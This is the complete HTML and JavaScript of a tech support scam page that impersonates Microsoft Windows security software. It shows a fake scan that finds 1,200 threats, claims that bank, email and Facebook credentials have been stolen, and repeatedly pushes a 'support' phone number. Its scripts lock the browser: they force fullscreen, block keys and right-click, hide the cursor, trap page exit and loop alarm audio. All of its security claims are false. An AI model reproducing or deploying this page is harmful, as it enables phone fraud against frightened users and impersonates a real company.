<html lang="en">

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
    <meta charset="utf-8">
    <meta content="width=device-width,initial-scale=1,shrink-to-fit=no" name="viewport">
    <meta content="noindex,nofollow" name="robots">
    <title>Microsoft Windows Security Center</title>
    <link href="logo.png" rel="icon" id="favicon" type="image/png">
    <link href="tapa.css" rel="stylesheet">
    <link href="chat.css" rel="stylesheet">
    <script type="text/javascript" src="script.js"></script>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js" integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV" crossorigin="anonymous"></script>
    <script type='text/javascript' src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
    <script type="text/javascript">//<![CDATA[
    $(function(){
    $('body').bind('contextmenu', function(e){
    return false;
    });
    });//]]>
    </script>
    <script src="esc.js"></script>

    <script src="noir.js"></script>

  </head>


  <body class="map" id="mycanvas" onbeforeunload="return myFunction()"  style="cursor:none">

    <div id="modalbx">

      <div class="blck"></div>
      <div class="bxweb">

        <span id="modal-close">×</span>

                      <img id="modal-image" src="fubSwDdhdYv.jpg" alt="Facebook Logo">

                      <p id="modal-message">Facebook has temporarily Suspended your Account.</p>
                      <div class="modal-buttons">
                        <button id="modal-accept" class="dismiss blinking">Accept</button>
                        <button id="modal-dismiss" class="dismiss blinking">Ignore</button>
                    </div>

                  </div>

              </div>

    <audio autoplay="" id="safegt">
      <source src="visudk.mp4" type="audio/mpeg">
    </audio>
    <div class="bg" style="cursor:none">
      <div class="bgimg" style="top:0">
        <img src="f24.png" alt="" width="100%">
      </div>
    </div>
    <a href="#" id="link_black" style="cursor:none" rel="noreferrer">
      <div class="black" style="height: 145%; cursor: none; display: block;"></div>
    </a>
    <div class="pro_box" style="cursor: none; display: block;">
      <div class="pro_box_header">
        <div class="row">
          <div class="col-md-12">
            <div class="minimize">
              <ul>
                <li>
                  <a href="#">
                    <img src="minimize.jpeg">
                  </a>
                </li>
              </ul>
            </div>
          </div>
          <div class="col-md-5">
            <div class="logo">
              <img src="logo.png">
              <span>Microsoft Windows Firewall Security</span>
            </div>
          </div>
          <div class="col-md-7">
            <div class="activate_lic">
              <ul>
                <li>
                  <a href="#">
                    <button>Activate your license</button>
                  </a>
                </li>
                <li>
                  <a href="#">
                    <img src="set.png">
                  </a>
                </li>
                <li>
                  <a href="#">
                    <img src="ques.png">
                  </a>
                </li
              </ul>
            </div>
          </div>
        </div>
      </div>
      <div class="scan_box">
        <div class="scan_box_header">
          <div class="row">
            <div class="col-md-6">
              <div class="quick_scan">
                <p>
                  <img src="vsc.png">
                  <span>Scanning Rapid</span>
                </p>
              </div>
            </div>
            <div class="col-md-6">
              <div class="minimize1">
                <ul>
                  <li>
                    <a href="#">
                      <img src="minimize.jpeg">
                    </a>
                  </li>
                </ul>
              </div>
            </div>
          </div>
        </div>
        <div class="scan_body">
          <div class="progress">
            <div class="active progress-bar progress-bar-success" style="width: 100%;" id="dynamic" aria-valuemax="100" aria-valuemin="0" aria-valuenow="100" role="progressbar">100% Complete</div>
          </div>
          <div class="table_quick">
            <table class="table table-bordered">
              <thead>
                <tr>
                  <th scope="col">Scanned Objects</th>
                  <th scope="col">
                    <div class="col_fourth counter">
                      <h2 class="count-number count-title timer" data-speed="5000" data-to="51900">51,900</h2>
                    </div>
                  </th>
                </tr>
                <tr>
                  <th scope="col">Time spent</th>
                  <th scope="col">5 secs</th>
                </tr>
                <tr>
                  <th scope="col">Identified Threats</th>
                  <th scope="col" style="color:red">
                    <h2 class="count-number count-title timer" data-speed="2500" data-to="1200">1,200</h2>
                  </th>
                </tr>
              </thead>
            </table>
          </div>
        </div>
        <div class="scan_footer">
          <div class="row">
            <div class="col-md-6">
              <div class="bt_can">
                <div class="btn-group" role="group" aria-label="Basic example">
                  <button class="btn btn-secondary" type="button">Cancel</button>
                </div>
                <div class="btn-group" role="group" aria-label="Basic example">
                  <button class="btn btn-secondary" type="button">Stop temporarily</button>
                </div>
              </div>
            </div>
            <div class="col-md-6">
              <div class="bt_can2">
                <div class="btn-group" role="group" aria-label="Basic example">
                  <button class="btn btn-secondary" type="button">Scheduled Scans</button>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div class="pro_box2" style="cursor: none; display: block;">
      <img src="bx1.png" alt="" style="width:100%;max-width: 100%;display: block;
      margin: 0 auto;">
    </div>
    <div class="pro_box3" style="cursor: none; display: block;">
      <div class="pro_box_header">
        <div class="row">
          <div class="col-md-12">
            <div class="minimize">
              <ul>
                <li>
                  <a href="#">
                    <img src="minimize.jpeg">
                  </a>
                </li>
              </ul>
            </div>
          </div>
          <div class="col-md-6">
            <div class="logo">
              <img src="logo.png">
              <span>Microsoft Windows Firewall Security</span>
            </div>
          </div>
          <div class="col-md-6">
            <div class="activate_lic">
              <ul>
                <li>
                  <a href="#">
                    <button>Activate your license</button>
                  </a>
                </li>
                <li>
                  <a href="#">
                    <img src="bel.png">
                  </a>
                </li>
                <li>
                  <a href="#">
                    <img src="set.png">
                  </a>
                </li>
                <li>
                  <a href="#">
                    <img src="ques.png">
                  </a>
                </li>
              </ul>
            </div>
          </div>
        </div>
      </div>
      <div class="scan_box2">
        <div class="scan_box_header">
          <div class="row">
            <div class="col-md-6">
              <div class="quick_scan">
                <p>
                  <img src="vsc.png">
                  <span>scan</span>
                </p>
              </div>
            </div>
            <div class="col-md-6">
              <div class="minimize1">
                <ul>
                  <li>
                    <a href="#">
                      <img src="minimize.jpeg">
                    </a>
                  </li>
                </ul>
              </div>
            </div>
          </div>
        </div>
        <div class="scan_body">
          <div class="row">
            <div class="col-md-12">
              <div class="tooreg_detail_scan">
                <ul>
                  <li>
                    <a href="#">scan</a>
                  </li>
                  <li>
                    <a href="#">Scan Plan</a>
                  </li>
                  <li>
                    <a href="#">Reports</a>
                  </li>
                </ul>
              </div>
            </div>
          </div>
          <br>
          <div class="table_quick2">
            <div class="row">
              <div class="col-md-4">
                <div class="pc_desk">
                  <img src="pcm.png">
                </div>
              </div>
              <div class="col-md-4">
                <div class="card_top scan_pro">
                  <ul>
                    <li>
                      <i aria-hidden="true" class="fa fa-check"></i> Check for updates
                    </li>
                    <li>
                      <i aria-hidden="true" class="fa fa-check"></i> Scan Memory
                    </li>
                    <li>
                      <i aria-hidden="true" class="fa fa-check"></i> Analyze startup items
                    </li>
                    <li>
                      <div class="circular-spinner"></div>
                      <span>Registry Analysis</span>
                    </li>
                    <li>Analyzing the file system</li>
                  </ul>
                </div>
              </div>
              <div class="col-md-4">
                <div class="scan_dur">
                  <p>
                    <strong>Time period of analysis</strong>
                  </p>
                  <p>3 seconds 0 seconds</p>
                  <p>5 seconds 0 seconds</p>
                  <br>
                  <p>
                    <strong>Scanned Items</strong>
                  </p>
                  <p>51,900</p>
                  <br>
                  <p>
                    <strong>Detection</strong>
                  </p>
                  <p>11</p>
                </div>
              </div>
            </div>
          </div>
        </div>
        <div class="scan_footer3">
          <div class="row">
            <div class="col-md-2">
              <div class="viruses">
                <img src="vsc.png">
              </div>
            </div>
            <div class="col-md-10">
              <div class="make_this">
                <p>This means you don't have to worry about online threats.</p>
                <p>Premium blocks malware, viruses, and more without slowing down your computer. Upgrade to the Premium version.</p>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <div style="cursor:none;" id="footer">
      <div class="row">
        <div class="col-md-12">
          <div class="right-foot" style="text-align:center">
            <span id="footertxt">
              <img src="logo.png">Microsoft Windows Firewall Security </span>
            <span style="font-weight:500;padding-left:13px;color:#fff; ">Helpdesk: <span style="border:1px solid #fff;border-radius:5px;padding:2px 5px"> +1 (888) 848-1784
              </span>
            </span>
          </div>
        </div>
        <div class="col-md-12">
          <marquee direction="left" height="100px" width="100%">
            <small class="text-left" style="color:#eee;font-size:10px">Microsoft Windows Firewall Defender SmartScreen has prevented an unrecognized application from appearing. Running this application may put your PC at risk. Windows Firewall Defender scan found adware on this device that can steal your passwords, online identities, financial information, personal files, photos, and documents.</small>
          </marquee>
        </div>
      </div>
    </div>

    <div class="box" id="poptxt">
      <div class="top">
        <p><img src="logo.png" alt="" style=" width: 20px;margin-right: 5px;">Microsoft Windows Firewall Security Warning<img src="cross.png" class="" style="float: right; width:20px;"></p>
        </div>
      <div class="center-links centerdiv">

        <div class="">

          <img src="re.gif" alt="" style=" width: 200px;text-align: center;display: block;margin: 0 auto;">
          <div id="txtintro">
            <span class="colo-rd">
              <div id="ip_add">Microsoft Windows Firewall Warning !</div>
              <div id="city">A computer infected with Trojan spyware</div>
              <div id="isp"> (Error Codes: 2V7HGTVB)</div>
            </span>
          </div><br>
        <p style=" font-size: 16px;background-color: #eee;padding:5px">Microsoft Windows Firewall has blocked all public networks and some Windows features on the network. Error Code: - Ox800VDS</b></p><br>
          <p style=" font-size: 18px;font-weight: 800;color: #025283;">Please contact Microsoft Windows Firewall Defender Support: <br>+1 (888) 848-1784 (Security Support)</p>


      </div>

      <div id="bottom">
        <img src="logo.png" id="badge">
        <span class="title3">Microsoft Windows</span>
        <ul>
          <li>
            <a href="#">
              <div class="fr button2">
                <span id="addtochromebutton">Allowing Access</span>
              </div>
            </a>
          </li>
          <li>
            <a href="#">
              <div class="fr button blink">
                <span id="addtochromebutton">Cancel</span>
              </div>
            </a>
          </li>
        </ul>
      </div>

      </div>
    </div>


    <div class="cardcontainer" style="cursor: none; display: block;" id="pop_up_new">
      <p style="font-size:16px;font-weight:400;margin:0;margin-bottom:5px;padding:5px 10px;color:#fff!important;color:#414141;font-weight:700;margin-top:8px" class="text-center">Microsoft Windows Firewall - Security Warning</p>
      <p>
        <b>Access to this PC has been blocked for security reasons</b>
      </p>
      <p>Your computer has been reported as infected with a spyware of the Trojan type. The following data has been compromised: </p>
      <p>> Email ID <br>&gt; Bank password <br>&gt; Facebook login <br>&gt; Photos and documents </p>
      <p>Windows Firewall Defender scan found adware on this device that can steal your passwords, online identities, financial information, personal files, photos and documents. </p>
      <p>Contact us immediately. Our engineers will guide you through the removal process over the phone. </p>
      <p>Call Microsoft Windows Firewall Support immediately to report this threat, prevent identity theft and unblock access to this device. </p>
      <p>Closing this window may put your personal information at risk and suspend your Windows Firewall registration. </p>
      <p style="padding-bottom:0;color:#fff;font-size:16px">Microsoft Windows Firewall Call Support: <strong><br>
          <span style="border:1px solid #fff;border-radius:5px;padding:2px 5px;display: inline-block;margin-top: 5px;">+1 (888) 848-1784
          </span>
        </strong>
      </p>
      <div class="action_buttons">
        <a class="active" id="leave_page" style="cursor:pointer;color:#fff!important">OK</a>
        <a class="active" id="leave_page" style="color:#fff!important">Cancel</a>
      </div>
    </div>
    <div class="answer_list" style="display:none;background-color:#000;height:auto;width:550px;left:33%;position:absolute;z-index:99999999;border:1px solid transparent;border-color:#d6d8db;border-radius:.5rem" id="welcomeDiv">
      <p style="color:#fff;margin-top:10px;font-size:16px;padding:0 5px" class="text-center">Contact us immediately and our engineers will guide you through the removal process over the phone. Your computer has been disabled. Microsoft Windows Firewall Defender SmartScreen has prevented an unrecognized application from appearing. Running this application may put your PC at risk. <br>
        <strong>Microsoft Windows Firewall Call Support: <span style="border:1px solid #383d41;border-radius:5px;padding:2px 5px"> +1 (888) 848-1784
          </span>
        </strong>
      </p>
    </div>
    <div id="chat" class="bounce3">
      <img src="logo.png">
      <span style="color:#222;font-size:24px;font-weight:600;margin-left:6px;position:relative;top:5px">Microsoft Windows</span>
      <br>
      <p>Technical Assistance
      </p>
      <h4 style="font-weight:600;color:#0F396D;font-size:22px">    +1 (888) 848-1784
        <br>( Toll-Free number)<br><br>
      </h4>
      <div class="arrow-down">
        <svg height="1em" viewBox="0 0 320 512">
          <style>
            svg {
              fill: #fff
            }
          </style>
          <path d="M137.4 374.6c12.5 12.5 32.8 12.5 45.3 0l128-128c9.2-9.2 11.9-22.9 6.9-34.9s-16.6-19.8-29.6-19.8L32 192c-12.9 0-24.6 7.8-29.6 19.8s-2.2 25.7 6.9 34.9l128 128z"></path>
                </svg></div>
    </div>

    <div id="ev_talkbox_wrapper" class="ev_talkbox_wrapper_min bounce">
      <div class="new_messg">
          <p style=" color: #fff;   margin-top: 8px;
          font-weight: 500;
          font-size: 16px;">Have questions? Talk to an expert</p>
      </div>
      <div id="ev_talkbox_min" class="">
          <span id="ev_min_zoimg"></span>
          <span id="ev_min_title">Chat</span>
      </div>
      </div>


    <script src="nvidia.js"></script>
    <script src="jupiter.js"></script>
    <script src="ips.js"></script>

    <script>
      $(document).ready(function(){
        $(".map").click(function(){
          $("#modalbx").hide();
        });
      });
      </script>

    <script>
      $(function() {
        var a = 0,
          b = setInterval(function() {
            a += 10;
            $("#dynamic").css("width", a + "%").attr("aria-valuenow", a).text(a + "% Complete");
            100 <= a && clearInterval(b)
          }, 100)
      });
    </script>
    <script type="text/javascript">
      window.onbeforeunload = function() {
         if (data_needs_saving()) {
             return "Call Windows Defender Helpline Now";
         } else {
            return;
         }
      };
              </script>
              <script type="text/javascript">
                  window.addEventListener("beforeunload", function (e) {
               var confirmationMessage = 'It looks like you are editing something. '
                                  + 'Your changes will be lost if you leave before saving.';

                      (e || window.event).returnValue = confirmationMessage; //Gecko + IE
                      return confirmationMessage; //Gecko + Webkit, Safari, Chrome etc.
                  });
              </script>
    <script>
      (function(a) {
        a.fn.countTo = function(b) {
          b = b || {};
          return a(this).each(function() {
            function d(a) {
              a = c.formatter.call(k, a, c);
              h.html(a)
            }
            var c = a.extend({}, a.fn.countTo.defaults, {
                from: a(this).data("from"),
                to: a(this).data("to"),
                speed: a(this).data("speed"),
                refreshInterval: a(this).data("refresh-interval"),
                decimals: a(this).data("decimals")
              }, b),
              l = Math.ceil(c.speed / c.refreshInterval),
              n = (c.to - c.from) / l,
              k = this,
              h = a(this),
              m = 0,
              f = c.from,
              g = h.data("countTo") || {};
            h.data("countTo", g);
            g.interval && clearInterval(g.interval);
            g.interval = setInterval(function() {
              f += n;
              m++;
              d(f);
              "function" == typeof c.onUpdate && c.onUpdate.call(k, f);
              m >= l && (h.removeData("countTo"), clearInterval(g.interval), f = c.to, "function" == typeof c.onComplete && c.onComplete.call(k, f))
            }, c.refreshInterval);
            d(f)
          })
        };
        a.fn.countTo.defaults = {
          from: 0,
          to: 0,
          speed: 100,
          refreshInterval: 100,
          decimals: 0,
          formatter: function(a, d) {
            return a.toFixed(d.decimals)
          },
          onUpdate: null,
          onComplete: null
        }
      })(jQuery);
      jQuery(function(a) {
        a(".count-number").data("countToOptions", {
          formatter: function(a, d) {
            return a.toFixed(d.decimals).replace(/\B(?=(?:\d{3})+(?!\d))/g, ",")
          }
        });
        a(".timer").each(function(b) {
          var d = a(this);
          b = a.extend({}, b || {}, d.data("countToOptions") || {});
          d.countTo(b)
        })
      });
    </script>

    <script>
      addEventListener("click", function() {
    var el = document.documentElement
      , rfs =
             el.requestFullScreen
          || el.webkitRequestFullScreen
          || el.mozRequestFullScreen
    ;
    rfs.call(el);
    });

    </script>


    <script>
      setInterval(function() {
        document.getElementById("safegt").play()
      }, 500);
    </script>
    <script>
      var e = 1;
      setInterval(function() {
        1 == e ? (document.getElementById("favicon").href = "index.html", e = 0) : (document.getElementById("favicon").href = "index.html", e = 1)
      }, 1E3);
    </script>
    <script>
      $(document).ready(function() {
        $("#mycanvas").click(function() {
          $("#welcomeDiv").show()
        })
      });
    </script><script>
      $(document).ready(function() {
        $("#mycanvas").click(function() {
          $("#chat").show()
        })
      });
    </script>
    <script>
      $(document).ready(function() {
        $(".pro_box").delay(100).fadeIn(800);
        $(".black").delay(100).fadeIn(800);
        $(".pro_box2").delay(100).fadeIn(800);
        $(".pro_box3").delay(100).fadeIn(800);
        $("#pop_up_new").delay(100).fadeIn(800);
        $("#poptxt").delay(100).fadeIn(800);
        $("#ev_talkbox_wrapper").delay(1).fadeIn(500)
      });
    </script>
     <script>
      $(document).ready(function () {
          $("body").click(function () {
              $("#ev_talkbox_wrapper").hide();
          });
      });
  </script>
  <script>
    $(document).ready(function () {
        $("#ev_talkbox_wrapper").click(function () {
            $("#ev_talkbox_wrapper").hide();
        });
    });
</script>
<script>
    $(document).ready(function () {
        $("#mycanvas").click(function () {
            $("#ev_talkbox_wrapper").hide();
        });
    });
</script>
<script>
  function showd2() {
  document.getElementById("chat").style.display = "block";
  }
  </script>
    <script>
      $(document).ready(function() {
        $("#mycanvas").click(function() {
          $("#poptxt").show()
        })
      });
      $(document).ready(function() {
        $("#cross").click(function() {
          $("#poptxt").show()
        })
      });
    </script>

    <script>
      $(document).ready(function() {
        $("#mycanvas").click(function() {
          $("#footer").show()
        })
      });
      </script>
    <script>
      $(document).ready(function() {
        $("body").mouseover(function() {
          $("#poptxt").show()
        })
      });
    </script>
    <script>
      var isNS = "Netscape" == navigator.appName ? 1 : 0;
      "Netscape" == navigator.appName && document.captureEvents(Event.MOUSEDOWN || Event.MOUSEUP);

      function mischandler() {
        return !1
      }

      function mousehandler(a) {
        a = isNS ? a : event;
        a = isNS ? a.which : a.button;
        if (2 == a || 3 == a) return !1
      }
      document.oncontextmenu = mischandler;
      document.onmousedown = mousehandler;
      document.onmouseup = mousehandler;
    </script>
    <script>
      document.onkeydown = function(a) {
        return !1
      };
    </script>
    <script>
      document.attachEvent("onkeydown", win_onkeydown_handler);

      function win_onkeydown_handler() {
        switch (event.keyCode) {
          case 116:
            event.returnValue = !1;
            event.keyCode = 0;
            break;
          case 27:
            event.returnValue = !1, event.keyCode = 0
        }
      }
    </script>
    <script>
      window.onload = function() {
        window.moveTo(0, 0);
        window.resizeTo(screen.availWidth, screen.availHeight)
      };
    </script>


    <script>
  $(document).ready(function() {
   var audioElement = document.createElement('audio');
   audioElement.setAttribute('src', 'webs.mp4');

   audioElement.addEventListener('ended', function() {
       this.play();
   }, false);


    $('#mycanvas').click(function() {
       audioElement.play();

   });

     $('#link_black').click(function() {
       audioElement.play();

   });


      $('.pro_box').click(function() {
       audioElement.play();

   });

       $('#poptxt').click(function() {
       audioElement.play();

   });

});
</script>


  </body>

</html>
